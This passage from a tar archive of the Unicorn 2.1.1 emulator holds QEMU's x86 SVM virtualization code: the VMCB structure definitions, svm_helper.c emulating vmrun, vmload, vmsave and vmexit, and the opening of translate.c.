(1ULL << 3) #define SVM_NPTEXIT_ID (1ULL << 4) #define SVM_NPTEXIT_GPA (1ULL << 32) #define SVM_NPTEXIT_GPT (1ULL << 33) QEMU_PACK(struct vmcb_control_area { uint16_t intercept_cr_read; uint16_t intercept_cr_write; uint16_t intercept_dr_read; uint16_t intercept_dr_write; uint32_t intercept_exceptions; uint64_t intercept; uint8_t reserved_1[44]; uint64_t iopm_base_pa; uint64_t msrpm_base_pa; uint64_t tsc_offset; uint32_t asid; uint8_t tlb_ctl; uint8_t reserved_2[3]; uint32_t int_ctl; uint32_t int_vector; uint32_t int_state; uint8_t reserved_3[4]; uint64_t exit_code; uint64_t exit_info_1; uint64_t exit_info_2; uint32_t exit_int_info; uint32_t exit_int_info_err; uint64_t nested_ctl; uint8_t reserved_4[16]; uint32_t event_inj; uint32_t event_inj_err; uint64_t nested_cr3; uint64_t lbr_ctl; uint8_t reserved_5[832]; }); QEMU_PACK(struct vmcb_seg { uint16_t selector; uint16_t attrib; uint32_t limit; uint64_t base; }); QEMU_PACK(struct vmcb_save_area { struct vmcb_seg es; struct vmcb_seg cs; struct vmcb_seg ss; struct vmcb_seg ds; struct vmcb_seg fs; struct vmcb_seg gs; struct vmcb_seg gdtr; struct vmcb_seg ldtr; struct vmcb_seg idtr; struct vmcb_seg tr; uint8_t reserved_1[43]; uint8_t cpl; uint8_t reserved_2[4]; uint64_t efer; uint8_t reserved_3[112]; uint64_t cr4; uint64_t cr3; uint64_t cr0; uint64_t dr7; uint64_t dr6; uint64_t rflags; uint64_t rip; uint8_t reserved_4[88]; uint64_t rsp; uint8_t reserved_5[24]; uint64_t rax; uint64_t star; uint64_t lstar; uint64_t cstar; uint64_t sfmask; uint64_t kernel_gs_base; uint64_t sysenter_cs; uint64_t sysenter_esp; uint64_t sysenter_eip; uint64_t cr2; uint8_t reserved_6[32]; uint64_t g_pat; uint64_t dbgctl; uint64_t br_from; uint64_t br_to; uint64_t last_excp_from; uint64_t last_excp_to; }); QEMU_PACK(struct vmcb { struct vmcb_control_area control; struct vmcb_save_area save; }); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/svm_helper.c���������������������������������������������������������0000664�0000000�0000000�00000071714�14675241067�0020454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 SVM helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" /* Secure Virtual Machine helpers */ static inline void svm_save_seg(CPUX86State *env, hwaddr addr, const SegmentCache *sc) { CPUState *cs = env_cpu(env); x86_stw_phys(cs, addr + offsetof(struct vmcb_seg, selector), sc->selector); x86_stq_phys(cs, addr + offsetof(struct vmcb_seg, base), sc->base); x86_stl_phys(cs, addr + offsetof(struct vmcb_seg, limit), sc->limit); x86_stw_phys(cs, addr + offsetof(struct vmcb_seg, attrib), ((sc->flags >> 8) & 0xff) | ((sc->flags >> 12) & 0x0f00)); } static inline void svm_load_seg(CPUX86State *env, hwaddr addr, SegmentCache *sc) { CPUState *cs = env_cpu(env); unsigned int flags; sc->selector = x86_lduw_phys(cs, addr + offsetof(struct vmcb_seg, selector)); sc->base = x86_ldq_phys(cs, addr + offsetof(struct vmcb_seg, base)); sc->limit = x86_ldl_phys(cs, addr + offsetof(struct vmcb_seg, limit)); flags = x86_lduw_phys(cs, addr + offsetof(struct vmcb_seg, attrib)); sc->flags = ((flags & 0xff) << 8) | ((flags & 0x0f00) << 12); } static inline void svm_load_seg_cache(CPUX86State *env, hwaddr addr, int seg_reg) { SegmentCache sc1, *sc = &sc1; svm_load_seg(env, addr, sc); cpu_x86_load_seg_cache(env, seg_reg, sc->selector, sc->base, sc->limit, sc->flags); } void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) { CPUState *cs = env_cpu(env); target_ulong addr; uint64_t nested_ctl; uint32_t event_inj; uint32_t int_ctl; cpu_svm_check_intercept_param(env, SVM_EXIT_VMRUN, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmrun! " TARGET_FMT_lx "\n", addr); env->vm_vmcb = addr; /* save the current CPU state in the hsave page */ x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base), env->gdt.base); x86_stl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit), env->gdt.limit); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.base), env->idt.base); x86_stl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit), env->idt.limit); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr0), env->cr[0]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr2), env->cr[2]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr3), env->cr[3]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr4), env->cr[4]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr6), env->dr[6]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr7), env->dr[7]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.efer), env->efer); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rflags), cpu_compute_eflags(env)); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.es), &env->segs[R_ES]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.cs), &env->segs[R_CS]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ss), &env->segs[R_SS]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ds), &env->segs[R_DS]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rip), env->eip + next_eip_addend); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); /* load the interception bitmaps so we do not need to access the vmcb in svm mode */ env->intercept = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept)); env->intercept_cr_read = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_cr_read)); env->intercept_cr_write = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_cr_write)); env->intercept_dr_read = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_dr_read)); env->intercept_dr_write = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_dr_write)); env->intercept_exceptions = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_exceptions )); nested_ctl = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.nested_ctl)); if (nested_ctl & SVM_NPT_ENABLED) { env->nested_cr3 = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.nested_cr3)); env->hflags2 |= HF2_NPT_MASK; env->nested_pg_mode = 0; if (env->cr[4] & CR4_PAE_MASK) { env->nested_pg_mode |= SVM_NPT_PAE; } if (env->hflags & HF_LMA_MASK) { env->nested_pg_mode |= SVM_NPT_LMA; } if (env->efer & MSR_EFER_NXE) { env->nested_pg_mode |= SVM_NPT_NXE; } } /* enable intercepts */ env->hflags |= HF_GUEST_MASK; env->tsc_offset = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.tsc_offset)); env->gdt.base = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base)); env->gdt.limit = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit)); env->idt.base = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base)); env->idt.limit = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit)); /* clear exit_info_2 so we behave like the real hardware */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), 0); cpu_x86_update_cr0(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr0))); cpu_x86_update_cr4(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr4))); cpu_x86_update_cr3(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr3))); env->cr[2] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr2)); int_ctl = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); if (int_ctl & V_INTR_MASKING_MASK) { env->v_tpr = int_ctl & V_TPR_MASK; env->hflags2 |= HF2_VINTR_MASK; if (env->eflags & IF_MASK) { env->hflags2 |= HF2_HIF_MASK; } } cpu_load_efer(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.efer))); env->eflags = 0; cpu_load_eflags(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rflags)), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.es), R_ES); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), R_CS); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), R_SS); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), R_DS); env->eip = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rip)); env->regs[R_ESP] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rsp)); env->regs[R_EAX] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rax)); env->dr[7] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr7)); env->dr[6] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr6)); /* FIXME: guest state consistency checks */ switch (x86_ldub_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.tlb_ctl))) { case TLB_CONTROL_DO_NOTHING: break; case TLB_CONTROL_FLUSH_ALL_ASID: /* FIXME: this is not 100% correct but should work for now */ tlb_flush(cs); break; } env->hflags2 |= HF2_GIF_MASK; if (int_ctl & V_IRQ_MASK) { CPUState *cs = env_cpu(env); cs->interrupt_request |= CPU_INTERRUPT_VIRQ; } /* maybe we need to inject an event */ event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); if (event_inj & SVM_EVTINJ_VALID) { uint8_t vector = event_inj & SVM_EVTINJ_VEC_MASK; // uint16_t valid_err = event_inj & SVM_EVTINJ_VALID_ERR; uint32_t event_inj_err = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err)); // qemu_log_mask(CPU_LOG_TB_IN_ASM, "Injecting(%#hx): ", valid_err); /* FIXME: need to implement valid_err */ switch (event_inj & SVM_EVTINJ_TYPE_MASK) { case SVM_EVTINJ_TYPE_INTR: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = -1; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "INTR"); /* XXX: is it always correct? */ do_interrupt_x86_hardirq(env, vector, 1); break; case SVM_EVTINJ_TYPE_NMI: cs->exception_index = EXCP02_NMI; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = env->eip; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "NMI"); cpu_loop_exit(cs); break; case SVM_EVTINJ_TYPE_EXEPT: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = -1; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "EXEPT"); cpu_loop_exit(cs); break; case SVM_EVTINJ_TYPE_SOFT: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 1; env->exception_next_eip = env->eip; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "SOFT"); cpu_loop_exit(cs); break; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, " %#x %#x\n", cs->exception_index, // env->error_code); } } void helper_vmmcall(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_VMMCALL, 0, GETPC()); raise_exception(env, EXCP06_ILLOP); } void helper_vmload(CPUX86State *env, int aflag) { CPUState *cs = env_cpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_VMLOAD, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmload! " TARGET_FMT_lx // "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", // addr, x86_ldq_phys(cs, addr + offsetof(struct vmcb, // save.fs.base)), // env->segs[R_FS].base); svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.fs), R_FS); svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.gs), R_GS); svm_load_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); svm_load_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); #ifdef TARGET_X86_64 env->kernelgsbase = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.kernel_gs_base)); env->lstar = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.lstar)); env->cstar = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.cstar)); env->fmask = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sfmask)); #endif env->star = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.star)); env->sysenter_cs = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_cs)); env->sysenter_esp = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_esp)); env->sysenter_eip = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_eip)); } void helper_vmsave(CPUX86State *env, int aflag) { CPUState *cs = env_cpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_VMSAVE, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmsave! " TARGET_FMT_lx // "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", // addr, x86_ldq_phys(cs, // addr + offsetof(struct vmcb, save.fs.base)), // env->segs[R_FS].base); svm_save_seg(env, addr + offsetof(struct vmcb, save.fs), &env->segs[R_FS]); svm_save_seg(env, addr + offsetof(struct vmcb, save.gs), &env->segs[R_GS]); svm_save_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); svm_save_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); #ifdef TARGET_X86_64 x86_stq_phys(cs, addr + offsetof(struct vmcb, save.kernel_gs_base), env->kernelgsbase); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.lstar), env->lstar); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.cstar), env->cstar); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sfmask), env->fmask); #endif x86_stq_phys(cs, addr + offsetof(struct vmcb, save.star), env->star); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_cs), env->sysenter_cs); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_esp), env->sysenter_esp); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_eip), env->sysenter_eip); } void helper_stgi(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_STGI, 0, GETPC()); env->hflags2 |= HF2_GIF_MASK; } void helper_clgi(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_CLGI, 0, GETPC()); env->hflags2 &= ~HF2_GIF_MASK; } void helper_skinit(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_SKINIT, 0, GETPC()); /* XXX: not implemented */ raise_exception(env, EXCP06_ILLOP); } void helper_invlpga(CPUX86State *env, int aflag) { X86CPU *cpu = env_archcpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPGA, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } /* XXX: could use the ASID to see if it is needed to do the flush */ tlb_flush_page(CPU(cpu), addr); } void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, uint64_t param, uintptr_t retaddr) { CPUState *cs = env_cpu(env); if (likely(!(env->hflags & HF_GUEST_MASK))) { return; } if ((int32_t)type >= SVM_EXIT_READ_CR0 && type <= SVM_EXIT_READ_CR0 + 8) { if (env->intercept_cr_read & (1 << (type - SVM_EXIT_READ_CR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_WRITE_CR0 && type <= SVM_EXIT_WRITE_CR0 + 8) { if (env->intercept_cr_write & (1 << (type - SVM_EXIT_WRITE_CR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_READ_DR0 && type <= SVM_EXIT_READ_DR0 + 7) { if (env->intercept_dr_read & (1 << (type - SVM_EXIT_READ_DR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_WRITE_DR0 && type <= SVM_EXIT_WRITE_DR0 + 7) { if (env->intercept_dr_write & (1 << (type - SVM_EXIT_WRITE_DR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_EXCP_BASE && type <= SVM_EXIT_EXCP_BASE + 31) { if (env->intercept_exceptions & (1 << (type - SVM_EXIT_EXCP_BASE))) { cpu_vmexit(env, type, param, retaddr); } } else if (type == SVM_EXIT_MSR) { if (env->intercept & (1ULL << (SVM_EXIT_MSR - SVM_EXIT_INTR))) { /* FIXME: this should be read in at vmrun (faster this way?) */ uint64_t addr = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.msrpm_base_pa)); uint32_t t0, t1, ecx; ecx = env->regs[R_ECX]; #define XRANGE(x, a, b) (x >= a && x <= b) if (XRANGE(ecx, 0, 0x1fff)) { t0 = (ecx * 2) % 8; t1 = (ecx * 2) / 8; } else if (XRANGE(ecx, 0xc0000000, 0xc0001fff)) { t0 = (8192 + ecx - 0xc0000000) * 2; t1 = (t0 / 8); t0 %= 8; } else if (XRANGE(ecx, 0xc0010000, 0xc0011fff)) { t0 = (16384 + ecx - 0xc0010000) * 2; t1 = (t0 / 8); t0 %= 8; } else { cpu_vmexit(env, type, param, retaddr); t0 = 0; t1 = 0; } #undef XRANGE if (x86_ldub_phys(cs, addr + t1) & ((1 << param) << t0)) { cpu_vmexit(env, type, param, retaddr); } } } else if (env->intercept & (1ULL << (type - SVM_EXIT_INTR))) { cpu_vmexit(env, type, param, retaddr); } } void helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, uint64_t param) { cpu_svm_check_intercept_param(env, type, param, GETPC()); } void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, uint32_t next_eip_addend) { CPUState *cs = env_cpu(env); if (env->intercept & (1ULL << (SVM_EXIT_IOIO - SVM_EXIT_INTR))) { /* FIXME: this should be read in at vmrun (faster this way?) */ uint64_t addr = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.iopm_base_pa)); uint16_t mask = (1 << ((param >> 4) & 7)) - 1; if (x86_lduw_phys(cs, addr + port / 8) & (mask << (port & 7))) { /* next env->eip */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), env->eip + next_eip_addend); cpu_vmexit(env, SVM_EXIT_IOIO, param | (port << 16), GETPC()); } } } void cpu_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1, uintptr_t retaddr) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, retaddr, true); // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmexit(%08x, %016" PRIx64 ", %016" // PRIx64 ", " TARGET_FMT_lx ")!\n", // exit_code, exit_info_1, // x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, // control.exit_info_2)), // env->eip); cs->exception_index = EXCP_VMEXIT + exit_code; env->error_code = exit_info_1; /* remove any pending exception */ env->old_exception = -1; cpu_loop_exit(cs); } void do_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) { CPUState *cs = env_cpu(env); uint32_t int_ctl; if (env->hflags & HF_INHIBIT_IRQ_MASK) { x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_state), SVM_INTERRUPT_SHADOW_MASK); env->hflags &= ~HF_INHIBIT_IRQ_MASK; } else { x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_state), 0); } env->hflags2 &= ~HF2_NPT_MASK; /* Save the VM state in the vmcb */ svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.es), &env->segs[R_ES]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), &env->segs[R_CS]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), &env->segs[R_SS]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), &env->segs[R_DS]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base), env->gdt.base); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit), env->gdt.limit); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base), env->idt.base); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit), env->idt.limit); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.efer), env->efer); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr0), env->cr[0]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr2), env->cr[2]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr3), env->cr[3]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr4), env->cr[4]); int_ctl = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); int_ctl &= ~(V_TPR_MASK | V_IRQ_MASK); int_ctl |= env->v_tpr & V_TPR_MASK; if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { int_ctl |= V_IRQ_MASK; } x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl), int_ctl); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rflags), cpu_compute_eflags(env)); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rip), env->eip); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr7), env->dr[7]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr6), env->dr[6]); x86_stb_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cpl), env->hflags & HF_CPL_MASK); /* Reload the host state from vm_hsave */ env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); env->hflags &= ~HF_GUEST_MASK; env->intercept = 0; env->intercept_exceptions = 0; cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; env->tsc_offset = 0; env->gdt.base = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base)); env->gdt.limit = x86_ldl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit)); env->idt.base = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.base)); env->idt.limit = x86_ldl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit)); cpu_x86_update_cr0(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr0)) | CR0_PE_MASK); cpu_x86_update_cr4(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr4))); cpu_x86_update_cr3(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr3))); /* we need to set the efer after the crs so the hidden flags get set properly */ cpu_load_efer(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.efer))); env->eflags = 0; cpu_load_eflags(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rflags)), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK | VM_MASK)); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.es), R_ES); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.cs), R_CS); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ss), R_SS); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ds), R_DS); env->eip = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rip)); env->regs[R_ESP] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rsp)); env->regs[R_EAX] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rax)); env->dr[6] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr6)); env->dr[7] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr7)); /* other setups */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_code), exit_code); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_1), exit_info_1); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info), x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj))); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info_err), x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err))); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), 0); env->hflags2 &= ~HF2_GIF_MASK; /* FIXME: Resets the current ASID register to zero (host ASID). */ /* Clears the V_IRQ and V_INTR_MASKING bits inside the processor. */ /* Clears the TSC_OFFSET inside the processor. */ /* If the host is in PAE mode, the processor reloads the host's PDPEs from the page table indicated the host's CR3. If the PDPEs contain illegal state, the processor causes a shutdown. */ /* Disables all breakpoints in the host DR7 register. */ /* Checks the reloaded host state for consistency. */ /* If the host's rIP reloaded by #VMEXIT is outside the limit of the host's code segment or non-canonical (in the case of long mode), a #GP fault is delivered inside the host. */ } ����������������������������������������������������unicorn-2.1.1/qemu/target/i386/translate.c����������������������������������������������������������0000664�0000000�0000000�00001234452�14675241067�0020306�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 translation * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/translator.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "qemu/compiler.h" #include "unicorn/platform.h" #include "uc_priv.h" #define PREFIX_REPZ 0x01 #define PREFIX_REPNZ 0x02 #define PREFIX_LOCK 0x04 #define PREFIX_DATA 0x08 #define PREFIX_ADR 0x10 #define PREFIX_VEX 0x20 #ifdef TARGET_X86_64 #define CODE64(s) ((s)->code64) #define REX_X(s) ((s)->rex_x) #define REX_B(s) ((s)->rex_b) #else #define CODE64(s) 0 #define REX_X(s) 0 #define REX_B(s) 0 #endif #ifdef TARGET_X86_64 # define ctztl ctz64 # define clztl clz64 #else # define ctztl ctz32 # define clztl clz32 #endif /* For a switch indexed by MODRM, match all memory operands for a given OP. */ #define CASE_MODRM_MEM_OP(OP) \ case (0 << 6) | (OP << 3) | 0: \ case (0 << 6) | (OP << 3) | 1: \ case (0 << 6) | (OP << 3) | 2: \ case (0 << 6) | (OP << 3) | 3: \ case (0 << 6) | (OP << 3) | 4: \ case (0 << 6) | (OP << 3) | 5: \ case (0 << 6) | (OP << 3) | 6: \ case (0 << 6) | (OP << 3) | 7: \ case (1 << 6) | (OP << 3) | 0: \ case (1 << 6) | (OP << 3) | 1: \ case (1 << 6) | (OP << 3) | 2: \ case (1 << 6) | (OP << 3) | 3: \ case (1 << 6) | (OP << 